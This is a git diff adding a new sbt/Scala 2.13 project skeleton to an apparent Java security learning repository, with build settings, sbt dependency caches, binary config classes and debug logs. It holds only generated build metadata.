+{"name":"sbt","version":"1.10.1","bspVersion":"2.1.0-M1","languages":["scala"],"argv":["/Library/Java/JavaVirtualMachines/jdk1.8.0_65.jdk/Contents/Home/jre/bin/java","-Xms100m","-Xmx100m","-classpath","/Users/drunkbaby/Library/Application Support/JetBrains/IntelliJIdea2023.3/plugins/Scala/launcher/sbt-launch.jar","xsbt.boot.Boot","-bsp","--sbt-launch-jar=/Users/drunkbaby/Library/Application%20Support/JetBrains/IntelliJIdea2023.3/plugins/Scala/launcher/sbt-launch.jar"]}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/build.sbt b/JavaSecurity/JDK/Scala1/build.sbt
new file mode 100644
index 00000000..9196b85f
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/build.sbt
@@ -0,0 +1,8 @@
+ThisBuild / version := "0.1.0-SNAPSHOT"
+
+ThisBuild / scalaVersion := "2.13.8"
+
+lazy val root = (project in file("."))
+ .settings(
+ name := "Scala1"
+ )
diff --git a/JavaSecurity/JDK/Scala1/project/build.properties b/JavaSecurity/JDK/Scala1/project/build.properties
new file mode 100644
index 00000000..136f452e
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/build.properties
@@ -0,0 +1 @@
+sbt.version = 1.10.1
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac$.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac$.class
new file mode 100644
index 00000000..60c7fc58
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac$.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac.cache b/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac.cache
new file mode 100644
index 00000000..d8649da3
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac.cache
@@ -0,0 +1 @@
+root
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac.class
new file mode 100644
index 00000000..a53ae31a
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$a360fc2c85e10743d0ac.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922$.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922$.class
new file mode 100644
index 00000000..c907dfcf
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922$.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922.cache b/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922.cache
new file mode 100644
index 00000000..050f36c6
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922.cache
@@ -0,0 +1 @@
+sbt.internal.DslEntry
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922.class
new file mode 100644
index 00000000..c72759da
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$efc9dd1e0e3c1657c922.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8$.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8$.class
new file mode 100644
index 00000000..2776a0b2
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8$.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8.cache b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8.cache
new file mode 100644
index 00000000..050f36c6
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8.cache
@@ -0,0 +1 @@
+sbt.internal.DslEntry
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8.class
new file mode 100644
index 00000000..a05413db
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f112f1b521f25997dad8.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23$.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23$.class
new file mode 100644
index 00000000..6ab0da25
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23$.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23.cache b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23.cache
new file mode 100644
index 00000000..050f36c6
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23.cache
@@ -0,0 +1 @@
+sbt.internal.DslEntry
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23.class b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23.class
new file mode 100644
index 00000000..a0419df4
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/project/target/config-classes/$f5cf7f0a23260a905c23.class differ
diff --git a/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/sync/copy-resource b/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/sync/copy-resource
new file mode 100644
index 00000000..9d348e7b
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/sync/copy-resource
@@ -0,0 +1 @@
+[[{},{}],{}]
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/inputs b/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/inputs
new file mode 100644
index 00000000..2b158ad8
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/inputs
@@ -0,0 +1 @@
+-702981080
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/output b/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/output
new file mode 100644
index 00000000..0ff60c10
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/output
@@ -0,0 +1 @@
+{"cachedDescriptor":".","configurations":[{"configuration":{"name":"compile"},"modules":[],"details":[]},{"configuration":{"name":"compile-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.12.19","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"docs"},"modules":[],"details":[]},{"configuration":{"name":"optional"},"modules":[],"details":[]},{"configuration":{"name":"plugin"},"modules":[],"details":[]},{"configuration":{"name":"pom"},"modules":[],"details":[]},{"configuration":{"name":"provided"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.12.19","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"runtime"},"modules":[],"details":[]},{"configuration":{"name":"runtime-internal"},"modules":[],"details":[]},{"configuration":{"name":"scala-doc-tool"},"modules":[],"details":[]},{"configuration":{"name":"scala-tool"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-compiler","revision":"2.12.19","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-compiler","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-compiler","revision":"2.12.19","configurations":"optional","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-compiler","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.12.19","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.12.19","configurations":"optional","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-reflect","revision":"2.12.19","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-reflect","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang.modules","name":"scala-xml_2.12","revision":"2.2.0","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-lang","name":"*","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{"info.apiURL":"https://javadoc.io/doc/org.scala-lang.modules/scala-xml_2.13/","info.versionScheme":"early-semver"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-xml_2.12","type":"bundle","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/2.2.0/scala-xml_2.12-2.2.0.jar","extraAttributes":{"info.apiURL":"https://javadoc.io/doc/org.scala-lang.modules/scala-xml_2.13/","info.versionScheme":"early-semver"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/2.2.0/scala-xml_2.12-2.2.0.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"http://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://javadoc.io/doc/org.scala-lang.modules/scala-xml_2.13/","info.versionScheme":"early-semver"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"jline","name":"jline","revision":"2.14.6","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"jline","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar","extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar"]],"missingArtifacts":[],"evicted":false,"extraAttributes":{},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["The BSD License","http://www.opensource.org/licenses/bsd-license.php"]],"callers":[]}],"details":[]},{"configuration":{"name":"sources"},"modules":[],"details":[]},{"configuration":{"name":"test"},"modules":[],"details":[]},{"configuration":{"name":"test-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.12.19","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[{"organization":"org.scala-sbt","name":"io_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-ivy_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-position_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"sbt","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"util-logging_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"scripted-plugin_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}},{"organization":"org.scala-sbt","name":"librarymanagement-core_2.12","artifact":"*","configurations":[],"crossVersion":{"type":"Disabled"}}],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.12.19/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]}],"stats":{"resolveTime":-1,"downloadTime":-1,"downloadSize":-1,"cached":false},"stamps":{}}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/_global/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/_global/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/_global/csrLogger/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/_global/csrLogger/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/csrConfiguration/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/csrConfiguration/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/csrProject/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/csrProject/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/input_dsp b/JavaSecurity/JDK/Scala1/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/input_dsp
new file mode 100644
index 00000000..77b55f12
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/input_dsp
@@ -0,0 +1 @@
+-768128706
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/output_dsp b/JavaSecurity/JDK/Scala1/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/output_dsp
new file mode 100644
index 00000000..fa8310de
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/output_dsp
@@ -0,0 +1 @@
+{"{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.19\",\"configurations\":\"provided\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}}":{"value":{"$fields":["path","startLine"],"path":"(sbt.Classpaths.jvmBaseSettings) Defaults.scala","startLine":3407},"type":"LinePosition"}}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/ivyConfiguration/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/ivyConfiguration/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/ivySbt/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/ivySbt/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/moduleSettings/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/moduleSettings/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/projectDescriptors/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/projectDescriptors/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/scalaCompilerBridgeScope/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/scalaCompilerBridgeScope/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/_global/update/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/_global/update/_global/streams/out
new file mode 100644
index 00000000..0bf44041
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/_global/update/_global/streams/out
@@ -0,0 +1,3 @@
+[debug] not up to date. inChanged = true, force = false
+[debug] Updating ProjectRef(uri("file:/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/"), "scala1-build")...
+[debug] Done updating ProjectRef(uri("file:/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/"), "scala1-build")
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/_global/_global/compileOutputs/previous b/JavaSecurity/JDK/Scala1/project/target/streams/compile/_global/_global/compileOutputs/previous
new file mode 100644
index 00000000..faea7848
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/_global/_global/compileOutputs/previous
@@ -0,0 +1 @@
+["sbt.Task[scala.collection.Seq[java.nio.file.Path]]",["/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/zinc/inc_compile_2.12.zip"]]
